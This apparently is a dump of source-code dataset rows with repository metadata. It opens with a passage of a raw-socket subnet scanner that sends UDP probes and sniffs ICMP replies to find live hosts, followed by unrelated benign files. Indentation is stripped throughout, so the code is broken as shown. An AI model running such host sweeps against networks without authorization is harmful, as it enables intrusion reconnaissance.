def __init__(self, socket_buffer=None):
# Map protocol constants to their names
self.protocol_map = {1:'ICMP', 6:'TCP', 17:'UDP'}
# Human readable IP addresses
self.src_address = socket.inet_ntoa(struct.pack('@I', self.src))
self.dst_address = socket.inet_ntoa(struct.pack('@I', self.dst))
# Human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP(Structure):
_fields_ = [
('type', c_ubyte),
('code', c_ubyte),
('checksum', c_ushort),
('unused', c_ushort),
('next_hop_mtu', c_ushort)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
def udp_sender(subnet, send_message):
time.sleep(5)
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(send_message.encode('UTF-8'), ('%s' % ip, 65212))
except:
pass
# Host to listen on
def main():
try:
if len(sys.argv) > 1:
host = sys.argv[1]
subnet = sys.argv[2]
else:
host = '192.168.1.119'
subnet = '192.168.1.0/24'
except Exception:
print('[!] Invalid number of parameters')
send_message = 'Welcome to Earth!'
# create raw socket and bind to public interface
if os.name == 'nt':
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
print('[*] Starting')
print(subnet, send_message)
# Start new thread for sending packets
t = threading.Thread(target=udp_sender, args=(subnet, send_message))
t.daemon = False
t.start()
try:
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Includes IP headers in capture
# If using Windows, send IOCTL to setup promiscuous mode
if os.name == 'nt':
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
# Read in a single packet
raw_buffer = sniffer.recvfrom(65565)[0]
# Create IP header from the buffer's first 20 bytes, passing in 32 bytes because of from_buffer_copy error
ip_header = IP(raw_buffer)
if ip_header.protocol == 'ICMP':
# Calculate location of ICMP in packet
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + sizeof(ICMP)]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
# Checks host is in target subnet
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
print('Host Up: %s' % ip_header.src_address)
except KeyboardInterrupt:
# Turn off promiscuous mode for Windows
if os.name == 'nt':
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
print('[!] Exiting!')
sys.exit(1)
if __name__ == '__main__':
main()
| [
"kenneth.cross@sjsu.edu"
] | kenneth.cross@sjsu.edu |
0cbec1209297db0cea54c9750fda3191b2c81c49 | 9f387c703dbf4d970d0259424c7b299108c369f5 | /dd_sdk_1_0/test/test_pphrase_status.py | d36c5ad98c7760744f7a337d75bf38b94574e36b | [] | no_license | gcezaralmeida/datadomain_sdk_python | c989e6846bae9435c523ab09e230fc12d020f7f1 | e102ec85cea5d888c8329626892347571832e079 | refs/heads/main | 2023-08-23T22:42:47.083754 | 2021-10-25T21:52:49 | 2021-10-25T21:52:49 | 370,805,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | # coding: utf-8
"""
DataDomain Rest API Documentation
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import dd_sdk_1_0
from dd_sdk_1_0.models.pphrase_status import PphraseStatus # noqa: E501
from dd_sdk_1_0.rest import ApiException
class TestPphraseStatus(unittest.TestCase):
"""PphraseStatus unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPphraseStatus(self):
"""Test PphraseStatus"""
# FIXME: construct object with mandatory attributes with example values
# model = dd_sdk_1_0.models.pphrase_status.PphraseStatus() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"root@s6006st157.petrobras.biz"
] | root@s6006st157.petrobras.biz |
c26f7da4618ce366665902e5302401eb51b7a7e7 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_168/192.py | 4b1c56e8937197c40bcc14b36ab4a85b81054688 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py |
# 0:right 1:down 2:left 3:up
DIRECTION = {'>': 0, 'v': 1, '<': 2, '^': 3, }
dx = [1, 0, -1, 0]
dy = [0, 1, 0, -1]
if __name__ == '__main__':
T = int(raw_input())
for t in xrange(1, T + 1):
R, C = map(int, raw_input().split())
grid = [raw_input() for _ in xrange(R)]
count = 0
for i in xrange(R):
for j in xrange(C):
if grid[i][j] == '.':
continue
d = DIRECTION[grid[i][j]]
y, x = i, j
while True:
ny = y + dy[d]
nx = x + dx[d]
if nx < 0 or nx >= C or ny < 0 or ny >= R:
count += 1
break
if grid[ny][nx] != '.':
break
y, x = ny, nx
raw_count = [0] * R
column_count = [0] * C
for i in xrange(R):
for j in xrange(C):
if grid[i][j] != '.':
raw_count[i] += 1
column_count[j] += 1
f = False
for i in xrange(R):
for j in xrange(C):
if grid[i][j] != '.' and raw_count[i] == 1 and column_count[j] == 1:
f = True
break
if f:
break
if f:
print "Case #%d: IMPOSSIBLE" % t
else:
print "Case #%d: %d" % (t, count)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8b09bf53667b6acc11353ed1ff084d9d679bc7d5 | 21ed75ebab9b413f485eac4804af3f867146b316 | /morseCode.py | 0f3fb088caed7806e9900265f7511fe8e8b8db63 | [] | no_license | jamesdeal89/notes | d73b9266bf17f60f3d51bd3c502119d3a915ce04 | c0326c54c9c0045f2296c04c9d4884df7b63f131 | refs/heads/master | 2020-12-12T18:24:56.209396 | 2020-12-10T01:27:05 | 2020-12-10T01:27:05 | 234,198,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,058 | py | # Allows a user to encode text into morse code
#dictionary I stole
MORSE_CODE_DICT = { 'A':'.-', 'B':'-...',
'C':'-.-.', 'D':'-..', 'E':'.',
'F':'..-.', 'G':'--.', 'H':'....',
'I':'..', 'J':'.---', 'K':'-.-',
'L':'.-..', 'M':'--', 'N':'-.',
'O':'---', 'P':'.--.', 'Q':'--.-',
'R':'.-.', 'S':'...', 'T':'-',
'U':'..-', 'V':'...-', 'W':'.--',
'X':'-..-', 'Y':'-.--', 'Z':'--..',
'1':'.----', '2':'..---', '3':'...--',
'4':'....-', '5':'.....', '6':'-....',
'7':'--...', '8':'---..', '9':'----.',
'0':'-----', ', ':'--..--', '.':'.-.-.-',
'?':'..--..', '/':'-..-.', '-':'-....-',
'(':'-.--.', ')':'-.--.-'}
english = input("enter text to be encoded")
morse = ""
for x in english:
if x != " ":
morse += MORSE_CODE_DICT[x]
else:
morse += '|'
print(morse)
| [
"j891319@protonmail.com"
] | j891319@protonmail.com |
3bd1e5e216c3e7be53b982d4c0a73af3ee74e8db | 5bc20150d596e49c2d79cc2348e11da76840f2d0 | /src/About.py | 8093203237e5e1d6fed76d66ea9b8bd7c65304be | [] | no_license | FranzPoize/spoontravel | 10e5309b3325581237a8fa4795ba53150228984e | 50d6f8de9df7018cd095541377ff8b667d91b9a7 | refs/heads/master | 2021-01-16T19:58:18.534235 | 2012-03-03T22:22:07 | 2012-03-03T22:22:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | from BaseHandler import BaseHandler
class About(BaseHandler):
def get(self):
context = {}
self.render_response('about.html', **context)
| [
"maxime@werlen.fr"
] | maxime@werlen.fr |
01c36da9c29dc88c708b32714c93d002770dc4da | e44112c5ffd151972846d46e8f0ec915fd33e59b | /모의고사3_5.py | 028a1b0c35481f882511125154bed650a4d85970 | [] | no_license | ssoomin1/CosPro_Test | b6a97a63f5de75bd95731e7e060677db011f668e | 1d968a5b964c7a1ca6708fc226e5c1997884b909 | refs/heads/main | 2023-04-23T10:10:48.055408 | 2021-05-17T14:59:32 | 2021-05-17T14:59:32 | 368,224,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | #신수민
def solution(mho_cards,mhe_cards):
result=-1
mho_check=0
mhe_check=0
for i in range(13):
if mho_cards[i]>mhe_cards[i]:
mho_check+=1
elif mhe_cards[i]>mho_cards[i]:
mhe_check+=1
if mho_check > mhe_check:
result=1
elif mho_check==mhe_check:
result=-1
elif mho_check < mhe_check:
result=0
return result
mho_cards=[1,2,3,4,5,6,7,8,9,10,11,12,13]
mhe_cards=[2,1,3,4,5,9,6,7,8,10,11,12,13]
ret=solution(mho_cards,mhe_cards)
print(ret) | [
"ssoomin1@naver.com"
] | ssoomin1@naver.com |
73fc05ec512bf4748f8e426e062163878f2c6ca7 | 6443dd730175e0f9e2bb672b9b84fafe66fe4b9d | /tests/app_controllers/test_travis_controller.py | edf09543e5da797272ca66310f709b8977c26711 | [] | no_license | cavalrytactics/securethebox-server | 8bde4add92b662ea2c106d14199e34db8883267d | c07e6efae469599a2990e222a89a73159339b807 | refs/heads/master | 2022-12-13T04:00:30.789742 | 2020-04-04T15:47:13 | 2020-04-04T15:47:13 | 239,040,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | from app_controllers.travis_controller import TravisController
import json
import os
import pytest
pytest.globalData = []
c = TravisController()
def loadGlobalData():
with open(str(os.getcwd())+"/tests/globalData.json", "r") as f:
pytest.globalData = json.load(f)
def test_loadGlobalData():
loadGlobalData()
with open(str(os.getcwd())+"/tests/globalData.json", "r") as f:
pytest.globalData = json.load(f)
def test_tarSecretFiles():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.tarSecretFiles(pytest.globalData["unencryptedFileNames"]) == True
def test_setTravisEncryptFile():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.setTravisEncryptFile() == True
def test_setTravisUnencryptFile():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.setTravisUnencryptFile() == True | [
"charleschong@Charless-MacBook-Pro.local"
] | charleschong@Charless-MacBook-Pro.local |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.